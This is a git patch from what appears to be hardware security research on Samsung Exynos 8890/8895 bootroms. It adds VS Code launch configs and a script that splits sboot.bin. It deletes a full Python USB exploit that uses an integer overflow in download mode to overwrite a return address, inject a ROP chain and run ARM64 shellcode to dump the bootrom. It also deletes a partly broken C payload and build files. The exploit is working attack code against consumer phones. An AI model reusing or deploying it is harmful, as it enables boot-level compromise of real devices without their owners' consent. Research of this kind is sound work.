From ceba89556672954b596f44746749210034533608 Mon Sep 17 00:00:00 2001
From: Eljakim Herrewijnen <eljakim.herrewijnen@gmail.com>
Date: Fri, 2 Aug 2024 21:19:14 +0200
Subject: [PATCH] update

---
 source/Makefile                    |  17 --
 source/S7/.vscode/launch.json      |  16 ++
 source/S7/split-sboot-8890.sh      |   5 +
 source/dump_bootrom.elf            | Bin 896 -> 0 bytes
 source/dwc3.elf                    | Bin 7584 -> 0 bytes
 source/dwc3.o                      | Bin 1584 -> 0 bytes
 source/entry.S                     |   2 -
 source/entry.o                     | Bin 640 -> 0 bytes
 source/exploit.py                  | 288 -----------------------------
 source/exploit/.vscode/launch.json |  16 ++
 source/ghidra.py                   |   9 -
 source/symbols.txt                 |   5 -
 source/test_dwc3.c                 | 100 ----------
 source/test_dwc3.ld                |  14 --
 14 files changed, 37 insertions(+), 435 deletions(-)
 delete mode 100644 source/Makefile
 create mode 100644 source/S7/.vscode/launch.json
 create mode 100755 source/S7/split-sboot-8890.sh
 delete mode 100644 source/dump_bootrom.elf
 delete mode 100755 source/dwc3.elf
 delete mode 100644 source/dwc3.o
 delete mode 100644 source/entry.S
 delete mode 100644 source/entry.o
 delete mode 100644 source/exploit.py
 create mode 100644 source/exploit/.vscode/launch.json
 delete mode 100644 source/ghidra.py
 delete mode 100644 source/symbols.txt
 delete mode 100644 source/test_dwc3.c
 delete mode 100644 source/test_dwc3.ld

diff --git a/source/Makefile b/source/Makefile
deleted file mode 100644
index 28d2fe1..0000000
--- a/source/Makefile
+++ /dev/null
@@ -1,17 +0,0 @@
-ifeq ($(ANDROID_NDK_ROOT),)
-$(error Error : Set the env variable 'ANDROID_NDK_ROOT' with the path of the Android NDK (version 20))
-endif
-
-CC := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android27-clang
-AR := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-ar
-OBJCOPY := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-objcopy
-LD := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-ld.bfd
-
-#==================Target Samsung S7 (8890)==================
-CFLAGS_SAMSUNGS7 = -Os
-
-dwc3:
-	$(CC) entry.S -c -o entry.o $(CFLAGS_SAMSUNGS7)
-	$(CC) $(CFLAGS_SAMSUNGS7) -c test_dwc3.c -o dwc3.o
-	$(LD) -T test_dwc3.ld entry.o dwc3.o -o dwc3.elf --just-symbols=symbols.txt
-	$(OBJCOPY) -O binary dwc3.elf dwc3.bin
diff --git a/source/S7/.vscode/launch.json b/source/S7/.vscode/launch.json
new file mode 100644
index 0000000..72536f9
--- /dev/null
+++ b/source/S7/.vscode/launch.json
@@ -0,0 +1,16 @@
+{
+    // Use IntelliSense to learn about possible attributes.
+    // Hover to view descriptions of existing attributes.
+    // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
+    "version": "0.2.0",
+    "configurations": [
+        {
+            "name": "Run exploit",
+            "type": "python",
+            "request": "launch",
+            "program": "exploit.py",
+            "console": "integratedTerminal",
+            "justMyCode": false
+        }
+    ]
+}
\ No newline at end of file
diff --git a/source/S7/split-sboot-8890.sh b/source/S7/split-sboot-8890.sh
new file mode 100755
index 0000000..03b4930
--- /dev/null
+++ b/source/S7/split-sboot-8890.sh
@@ -0,0 +1,5 @@
+# input file argument : sboot.bin - G930W8VLS6CSH1 - sha1sum: 9322ccb4e9b382b8cc67ff9ef989c459a763621f
+dd if=$1 of=$1.1.bin skip=0 bs=512 count=16 # 0x2000 @ 0x0
+dd if=$1 of=$1.2.bin skip=16 bs=512 count=288 # 0x24000 @ 0x2000
+dd if=$1 of=$1.3.bin skip=155648 bs=1 count=158992 # 0x26d10 @ 0x26000
+dd if=$1 of=$1.4.bin skip=776 bs=512 count=1672 # 0xD1000 @ 0x61000
diff --git a/source/dump_bootrom.elf b/source/dump_bootrom.elf
deleted file mode 100644
index 570320d35fcafe2a3178b4fe6cf6799d645e7e78..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 896
zcmb<-^>JfjWMqH=MuzPS2p&w7f#Cp>paWRgfq|WYjlq#&K@bB&Ll83q!xSKWiGe}>
z+TZHEE17{}$}tSaj!lh0f0-F3ehy|_*~&Kak_k|pb;Y7ji^Ls%varv*q{bkk#RB9{
z2C{{Lv@;8%=HZ5hAcq<T%?HdPS_^^d+zc2jnSQohTFAh#ld-TVXg-imW@6asz+it3
zq$ZKcVdv*y$CZDp53e}D9DfbrYV0g#tUhF5U}j*#s(~3OgAO3UffOiE1uS5ikwFAa
z122#-fX!Z&3Wn0+r1;|0ycCA`;*!Lo5(Wmn;>z5T#3UeHQUswhV62kViV_CBl*E!m
z2EC->Vl-Pw=Sl;$fPBG*rquz;2SzFifcOs~qzGh!^rMH+6@(HL7J7)O17$fV&<`>X
zTdduH+PVTtvjS<5A3=73fCPkM-~`g>ZU;#<Kpl!6kLd0f#G!u*RG|*YFeHGk9{^=L
BRrvq_

diff --git a/source/dwc3.elf b/source/dwc3.elf
deleted file mode 100755
index 2a73fb7205936272a5988aa12836f3388d208502..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 7584
zcmeHM%}*0S6o1_U!bK4=!ANw87)ukkOUp;=sc1AFFennP>wZi>OuJimhYCVc;zeRS
zNC<(W-h_BCkwi~wj4}KH#=D6oUJ(vlnmV&P!$$=!UT2ftH}iYH_j}u4XHTzkefWkH
z3IV?)cnAKjLy{<#W(m2IEqp8q63H|{*ylFxrpPL&<8i$sNb(4QI^6k%t)_i-M{in>
zPK&H?KsX>A5Do|jgag6>;ec>JI3OGl4hRQ?1Hu8}fN(%KARG`52nU1%dmK;z+P6kN
zthB?E(du+)rFsqKH^ZUmSo(##yj)q@1nB!6J{4`5NiRfCr<2W%u<=xa)XQ3JECREm
zb8V2SP7keYjeLIfDXe|pJaKM&foPE#!t=XCqpMY(PZOS$p54)}koqr+l_iQ-NRJ<3
zSmm4xWdD`iIVqhw-v|$AAF983?CLhvr?(99x9arAm1-E~f7WVCbU$QUu9LUqNPkLI
z)&7)h=pM3U$Clm1K>t9Z*X)taf^KK!GIG5<!BdK=B;`mB<C1qJ7SjU(CF?lZ0`i;*
z*F=ix6l2(N3T95v+p$8ST)bRzo%_hda$Fs>26e;i)#JL6NuW&9>Px7-gNXraKp#Yg
z8ISkr@s!#lM|NIiczFC)(AO*5J$wFzgO~nvh0S61GQwo~Qh(8zO#^Jy>hTsIAlW*d
z<A>nwhv>*YUxK%O+<kEUhC2O=gwjT4JsclqC2<m4$$PF}+SQ<|B*SMO?Z;^y)w#{|
z@3HhaiB#wHGy_=3kx2RP8K2LMij3bmwV(f(@!v3h14}<+_*xylNO0PB&S69zkd56b
z#ewcgMFkJ*E(VM|tXU7ugknOsrSyV}%(7<bSl3JgyaGZc$ReyE+bTJE8*9cyCWG8v
z8ccYGhRQ@*%aQY0Ah{wrh(I+pR8lp+kA_{{_P`@DzPMjScZ57;AdQN62v3wW7wHy&
z;!PE?ZjgxGAm;cAqe%?()E7xl{>%O=o+Z`vZ0^kZn4iGsf_3WLe-3xCdX)n#@_FJ~
z9Zq}Ei^r2>9rls^k3aOq$Q2F3&Xd=1fbReO+5l$H1dMf7Kxd%zTWAho{_}k7p#C>m
L|5e84p}zlLF1r61

diff --git a/source/dwc3.o b/source/dwc3.o
deleted file mode 100644
index d4c13dcab341d808712b10d739cb29e7a2eeabd6..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 1584
zcmbu8O=uHQ5XUD;Yg-hQ)`B4D3O%HSZZ=7q5Am>7)JwEdTTjBe*?sxYWH;`<#+DXZ
z@SuobO9d|;DtKtbg9ktGqDA!LS-cA#yq5ORONcY++jNbs7Y8;o^PB(7doTNT;e6&o
zFc1LG0`LxYGmipPI(B2V8LH5Q%B}GawWDxvqCOX>)z885W+*T;sjfOGdAtcQ@+;Ig
z)HAQH4E3w2?oQZv5QOxzMq@Gzixc;IAzhyvt8I;cT3Zik-!~7R*j~X|xc<^roN)?Z
zSw&q?U2M%?z<!!docxavyzn%X(^Ckl>64vso7SQEn_XwOX+Av?NZ;ynA8YjxEdOjY
zo=^^Bmg(3<Qwoo!6-60MOIh7zres@^6HkmL;!$HzGD^CYm#WNhi^$WmBB!Kqf%A%c
zIug-$2FQ8a&X<^LPdf&a4Z9rSwp}s`deMrMO4agk#j$TPgG(_bX(sio5!GXQHWz2P
zlsOVtqRDu|Oz26LHDa+5J(gAmrEqI2nas6IJL|etYY@-*PrHlN4%le4i`JXK_cDdx
zOVbBMw(I&aJhGd%qBHyOE695x2(N|G>$UdLzZCk6(BBaLk>DZ)ul`nW>Lc?`GK8_W
zR<j^}7<$^zE0KHpV<JC}m#tI8<R(SjhrGwfuZy_9jdQ_iPM1$V@8kaY4}IL*3!x<+
zKPcj+lO0ylWzJ?e(2XiHi-UQ`h-<8(XfD?su5m}VT$pyV8mnSiE8ul3F$eODYs@k$
zb`fEAI+sIM#=8izWpgH9ygW6G1B_eERu`36oy{_hCb^7HS2Ty|CUE9*jh2)RaF|im
zOr7hRkp<c14%f-gmdUq@K*O3c7%=5149v)i|4jc8KgHhA9{sBVer>DaYx%<tU`C9*
z-&B!&_Ct*Q?}$p&+s=q@i%(~b5;U4msGAZr@4g+vm}a#9A01+&Z%FJjftx*qr||KZ
cPX_Pzf_rG6Bm4U+2Ur*VDdEY{IotRD8yUdkZU6uP

diff --git a/source/entry.S b/source/entry.S
deleted file mode 100644
index 5dea2d7..0000000
--- a/source/entry.S
+++ /dev/null
@@ -1,2 +0,0 @@
-start:
-    b main
\ No newline at end of file
diff --git a/source/entry.o b/source/entry.o
deleted file mode 100644
index 0c578caa377eb87a0e0541743edd0d2012bb0a95..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 640
zcmb<-^>JfjWMqH=MuzPS2p&unNFxb4fQ20x*dT%;NUAWH=3o&f3~?SD;zB@i0Swg$
z0V$w6m=RnC2EC%xoJ75n)QS>@;*!Lo5{BHw%sd9Yy!?_>J$JuQU7%ocHiKSqNl{5+
z5|FOU1<@)MdIrd*kj+*H>O^r5)T9GY+6GF)D5PKn3$X!7kQj(Y1`bdT3$h@Pjm`(@
zMHd5USpgz|KmtNBumWjNEO0>iFmZ7pAKgtLB`#2P=oGqIeV_u&*kxewfND&D(ja}H
Ia6-2q0KIw|MgRZ+

diff --git a/source/exploit.py b/source/exploit.py
deleted file mode 100644
index addd672..0000000
--- a/source/exploit.py
+++ /dev/null
@@ -1,288 +0,0 @@
-import usb.core
-import usb.util
-import struct, sys, usb1, libusb1, ctypes, usb
-from keystone import *
-from capstone import *
-# from ghidra_assistant.utils.utils import *
-
-def p32(x):
-    return struct.pack("<I", x)
-
-def p8(x):
-    return struct.pack("<B", x)
-
-def p16(x):
-    return struct.pack("<H", x)
-
-def p64(x):
-    return struct.pack("<Q", x)
-
-BLOCK_SIZE = 512
-CHUNK_SIZE = 0xfffe00
-MAX_PAYLOAD_SIZE = (BLOCK_SIZE - 10)
-
-DL_BUFFER_START = 0x02021800
-DL_BUFFER_SIZE = 0x4E800 #0x02070000 End
-
-BOOTROM_START = 0x0
-BOOTROM_SIZE = 0x20000 #128Kb
-
-TARGET_OFFSETS = {
-    # XFER_BUFFER,	RA_PTR, XFER_END_SIZE
-    "8890": (0x02021800, 0x02020F08, 0x02070000), 
-    "8895": (0x02021800, 0x02020F18, 0x02070000)
-}
-
-ENDPOINT_BULK_IN = 0x81
-ENDPOINT_BULK_OUT = 0x2
-
-class ExynosDevice():
-
-    def __init__(self, idVendor=0x04e8, idProduct=0x1234):
-        """Init with vendor/product IDs"""
-        self.idVendor = idVendor
-        self.idProduct = idProduct
-        self.target = "8890"  # TODO auto detect device
-        self.connect_device()
-
-    def connect_device(self):
-        self.context = usb1.USBContext()
-        while True:
-            self.handle = self.context.openByVendorIDAndProductID(
-                vendor_id=self.idVendor,
-                product_id=self.idProduct,
-                skip_on_error=True
-            )
-            if self.handle == None:
-                continue
-            break
-
-        print("Connected device!")
-
-    def write(self, data, size=-1):
-        transfered = 0
-        transferred = ctypes.c_int()
-        if size == -1:
-            size = len(data)
-        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0)
-        assert(res == 0)
-        return transfered
-
-    def send_empty_transfer(self):
-        transfered = 0x200
-        transferred = ctypes.c_int()
-        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0)
-        assert(res == 0)
-        return transfered
-    
-    def test_bug_2(self):
-        # Also bug here
-        # payload = p32(1) + p32(CHUNK_SIZE + 0x2001) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
-        # self.write(payload, MAX_PAYLOAD_SIZE)
-        # self.write(b"\xaa" * CHUNK_SIZE, CHUNK_SIZE)
-        
-        transferred = ctypes.c_int()
-        bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
-        bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
-        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
-        assert res == 0
-        
-        payload = b"\xaa" * 0x200
-        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
-        assert res == 0
-        
-        payload = b"\xaa" * 0x200
-        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
-        while True:
-            res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
-        pass
-
-    def test_bug(self):
-        # Start by sending a valid packet
-        # Integer overflow in the size field
-        # unk + size + payload + header
-        payload = p32(0) + p32(0xFDFDE7FF + 0x1000) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
-
-        assert (len(payload) == BLOCK_SIZE)
-        self.write(payload, MAX_PAYLOAD_SIZE) 
-
-        for i in range(200):            
-            print(hex(self.send_empty_transfer()))
-        
-        print('Bug probably available')
-        sys.exit(0)
-
-    def exploit(self, payload: bytes):
-        current_offset = TARGET_OFFSETS[self.target][0]
-        transferred = ctypes.c_int()
-        
-        size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6 
-        max_payload_size = 0x100000000 - size_to_overflow
-        ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE)
-        
-        # max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
-        # max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200 
-        payload = payload + ((max_payload_size - len(payload)) * b"\x00")
-        assert len(payload) == max_payload_size, "Invalid payload"
-        
-        # First send payload to trigger the bug
-        bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE] # dummy packet for triggering the bug
-        bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
-        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
-        assert res == 0, "Error triggering payload"
-        assert transferred.value == len(bug_payload), "Invalid transfered size"
-        current_offset += len(bug_payload) - 8  # Remove header
-        
-        cnt = 0
-        while True:
-            if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]:
-                break
-            self.send_empty_transfer()
-            current_offset += CHUNK_SIZE
-            cnt += 1
-            if current_offset > 0x100000000:
-                current_offset = current_offset - 0x100000000 #reset 32 byte integer
-            print(f"{cnt} {hex(current_offset)}")
-        
-        remaining = (TARGET_OFFSETS[self.target][1] - current_offset)
-        assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet"
-        if remaining > BLOCK_SIZE:
-            self.send_empty_transfer()
-            # Send last transfer, TODO who aligns this ROM??
-            current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE)
-            cnt += 1
-            print(f"{cnt} {hex(current_offset)}")
-            
-        # Build ROP chain.
-        rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
-        transferred = ctypes.c_int(0)
-        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
-        assert res == 0, "Error sending ROP chain"
-        
-        # Send some data
-        p = b"\xaa" * 0x200
-        transferred.value = 0
-        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, p, len(p), ctypes.byref(transferred), 100)
-        assert res == 0, "Error sending data"
-        
-        buf = ctypes.c_buffer(b"", 0x20000)
-        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, 0x81, buf, len(buf), ctypes.byref(transferred), 100)
-        
-        # Should have received some bytes
-        pass
-
-ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN)
-def usb_debug():
-    shellcode = f"""
-    start:
-    adr x0, test_fun
-    ldr x0, [x0]
-    blr x0
-    
-    mov	w1, #0x20000 // size
-	mov w0, #0x0 // address
-	bl usb_send
-    mov x0, #0
-    br x0 //reset
-    
-    #Setup read usb
-    mov w0, #0x2
-    adr x1, shellcode_base
-    ldr x1, [x1]
-    mov w2, #0x02020000
-    add w2, w2, #0x2000
-    # endpoint, cb, buffer
-    adr x5, maybe_usb_setup_read
-    ldr x5, [x5]
-    blr x5
-
-    
-    # Get something?? arg0 is endpoint
-    mov w0, #0x2
-    adr x1, maybe_read_size_endpoint
-    ldr x1, [x1]
-    blr x1
-    
-    
-    # # Send some data from ROM
-	# mov	w1, #0x200 // size
-	# mov w0, #0x0 // address
-	# bl usb_send
-    # mov x0, #0
-    # br x0 //reset
-    
-    
-    # # dwc3_ep0_start_trans
-    # mov w1, w0
-    # mov w0, #0x2
-    # mov w2, #0x200
-    # adr x5, dwc3_ep0_start_trans
-    # ldr x5, [x5]
-    # blr x5
-    
-    # # Send some data from ROM
-	# mov	w1, #0x200 // size
-	# mov w0, #0x0 // address
-	# bl usb_send
-    # mov x0, #0
-    # br x0 //reset
-    
-    usb_send:
-	stp	x29, x30, [sp,#-48]!
-	mov	w3, #0x0
-	bfxil	w3, w1, #0, #24
-	mov	w1, #0xc12
-	mov	x29, sp
-	stp	x19, x20, [sp,#16]
-	mov	x5, #0xc834
-	mov	w20, #0x1
-	movk	x5, #0x1540, lsl #16
-	ldr	x2, [x29,#40]
-	mov	x4, #0xc838
-	orr	w6, w1, w20
-	movk	x4, #0x1540, lsl #16
-	mov	x19, #0xc83c
-	movk	x19, #0x1540, lsl #16
-	stp	w3, w1, [x2,#8]
-	mov	w3, #0x406
-	stp	w0, wzr, [x2]
-	mov	w0, w20
-	ldr	x1, [x29,#40]
-	strb	w6, [x2,#12]
-	mov	x2, #0x27c8
-	str	w1, [x5]
-	mov	w1, #0x1388
-	str	wzr, [x4]
-	str	w3, [x19]
-	blr	x2
-	mov	w0, w20
-	ldr	w1, [x19]
-	ldp	x19, x20, [sp,#16]
-	ldp	x29, x30, [sp],#48
-	ret
-
-    usb_read_endpoint: .quad 0x00006654
-    maybe_usb_setup_read: .quad 0x00006f88
-    shellcode_base: .quad 0x02021800
-    maybe_read_size_endpoint: .quad 0x00007a7c
-    dwc3_ep0_start_trans: .quad 0x0000791c
-    test_fun: .quad 0x000064e0
-"""
-    shellcode = ks.asm(shellcode, as_bytes=True)[0]
-    
-    shellcode = open("dwc3.bin", "rb").read()
-    
-    exynos = ExynosDevice()
-    exynos.exploit(shellcode)
-
-if __name__ == "__main__":
-    usb_debug()
-    sys.exit(0)
-    # wait_for_device()
-    exynos = ExynosDevice()
-    exynos.test_bug_2()
-    sys.exit(0)
-    path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin"
-    # path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin"
-    exynos.exploit(open(path, "rb").read())
-    pass
diff --git a/source/exploit/.vscode/launch.json b/source/exploit/.vscode/launch.json
new file mode 100644
index 0000000..ed07101
--- /dev/null
+++ b/source/exploit/.vscode/launch.json
@@ -0,0 +1,16 @@
+{
+    // Use IntelliSense to learn about possible attributes.
+    // Hover to view descriptions of existing attributes.
+    // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
+    "version": "0.2.0",
+    "configurations": [
+        {
+            "name": "Debug exploit",
+            "type": "debugpy",
+            "request": "launch",
+            "program": "exploit.py",
+            "console": "integratedTerminal",
+            "args": ["--debug"]
+        }
+    ]
+}
\ No newline at end of file
diff --git a/source/ghidra.py b/source/ghidra.py
deleted file mode 100644
index 18dfd85..0000000
--- a/source/ghidra.py
+++ /dev/null
@@ -1,9 +0,0 @@
-from ghidra_assistant.ghidra_assistant import GhidraAssistant
-
-if __name__ == "__main__":
-    rom = open("S7/rom.bin", 'rb').read()
-    
-    ga = GhidraAssistant()
-    ga.ghidra.add_memory(rom, 0x0, True, "ROM")
-    
-    pass
\ No newline at end of file
diff --git a/source/symbols.txt b/source/symbols.txt
deleted file mode 100644
index ce55876..0000000
--- a/source/symbols.txt
+++ /dev/null
@@ -1,5 +0,0 @@
-maybe_usb_setup_read = 0x00006f88;
-dwc3_ep0_start_trans = 0x0000791c;
-usb_event_handler = 0x00007bac;
-get_endpoint_buffer = 0x00007a7c;
-sleep = 0x000027c8;
\ No newline at end of file
diff --git a/source/test_dwc3.c b/source/test_dwc3.c
deleted file mode 100644
index f746b7a..0000000
--- a/source/test_dwc3.c
+++ /dev/null
@@ -1,100 +0,0 @@
-#include <stdint.h>
-
-//  Create external function at 0x00006f88
-extern void maybe_usb_setup_read(char endpoint,void *fun,uint32_t target_buffer);
-extern void dwc3_ep0_start_trans(char endpoint,uint32_t target_buf, uint32_t len);
-extern int usb_event_handler(void);
-extern void * get_endpoint_buffer(char endpoint);
-extern void sleep(int endpoint,uint32_t timeout);
-
-#define recv_buffer 0x02021800 + 0x2000
-#define data_received 0x02021800 + 0x2004
-
-void recv_data_cb(uint32_t endpoint, uint32_t len){
-    void *rbuf;
-    void *dest_buf = (void *)recv_buffer;
-    volatile void *dref = (void *)data_received;
-    
-    rbuf = get_endpoint_buffer(endpoint);
-    for(int i= 0; i < len; i++){
-        *(char *)dest_buf = *(char *)(void *)((int)rbuf + i);
-    }
-    *(uint8_t *)dref = 1; // Mark as ready
-}
-
-void recv_data(){
-    // Set data_received to 0
-    // uint32_t *r = (uint32_t *) data_received;
-    // r = 0;
-    volatile void *dref = (void *)data_received;
-    *(uint8_t *)dref = 0;
-
-    maybe_usb_setup_read(2, recv_data_cb, 0x200);
-    void *rbuf = get_endpoint_buffer(2);
-    dwc3_ep0_start_trans(2, (uint32_t)rbuf, 0x200);
-    while(1){
-        usb_event_handler();
-        if(*(uint8_t *)dref == 1){
-            break;
-        }
-    }
-}
-
-void send_data(void *address, uint32_t size){
-    maybe_usb_setup_read(0x81, NULL, 0x200);
-    void *rbuf = get_endpoint_buffer(1);
-    for(int i= 0; i < size; i++){
-        *(char *)(void *)((int)rbuf + i) = *(char *)(void *)((int)address + i);
-    }
-    dwc
-
-}
-
-void send_data(uint32_t *address, uint32_t size)
-{
-    // asm("stp	x29, x30, [sp,#-48]!");;
-    // asm("mov	w3, #0x0");
-    // asm("bfxil	w3, w1, #0, #24");
-    // asm("mov	w1, #0xc12");
-    // asm("mov	x29, sp");
-    // asm("stp	x19, x20, [sp,#16]");
-    // asm("mov	x5, #0xc834");
-    // asm("mov	w20, #0x1");
-    // asm("movk	x5, #0x1540, lsl #16");
-    // asm("ldr	x2, [x29,#40]");
-    // asm("mov	x4, #0xc838");
-    // asm("orr	w6, w1, w20");
-    // asm("movk	x4, #0x1540, lsl #16");
-    // asm("mov	x19, #0xc83c");
-    // asm("movk	x19, #0x1540, lsl #16");
-    // asm("stp	w3, w1, [x2,#8]");
-    // asm("mov	w3, #0x406");
-    // asm("stp	w0, wzr, [x2]");
-    // asm("mov	w0, w20");
-    // asm("ldr	x1, [x29,#40]");
-    // asm("strb	w6, [x2,#12]");
-    // asm("mov	x2, #0x27c8");
-    // asm("str	w1, [x5]");
-    // asm("mov	w1, #0x1388");
-    // asm("str	wzr, [x4]");
-    // asm("str	w3, [x19]");
-    // asm("blr	x2");
-    // asm("mov	w0, w20");
-    // asm("ldr	w1, [x19]");
-    // asm("ldp	x19, x20, [sp,#16]");
-    // asm("ldp	x29, x30, [sp],#48");
-    // asm("ret");
-}
-
-int main() {
-    while(1){
-        recv_data();
-    }
-    
-    
-
-    // recv_data();
-    // sleep(1, 5000);
-    asm("mov x0, #0x0");
-    asm("br x0");
-}
diff --git a/source/test_dwc3.ld b/source/test_dwc3.ld
deleted file mode 100644
index d2991ee..0000000
--- a/source/test_dwc3.ld
+++ /dev/null
@@ -1,14 +0,0 @@
-MEMORY {
-    ROM (rwx): ORIGIN = 0x02021800, LENGTH = 0x1000
-}
-
-SECTIONS
-{
-     . = 0x02021800;
-     .text . : {
-          *(.text*)
-          *(.data*)
-          *(.rodata*)
-     } >ROM
-
-}
\ No newline at end of file